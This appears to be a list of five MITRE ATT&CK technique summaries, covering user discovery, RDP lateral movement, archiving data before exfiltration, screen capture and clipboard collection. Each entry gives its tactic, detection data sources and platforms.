Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
Tactics:	Lateral Movement
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre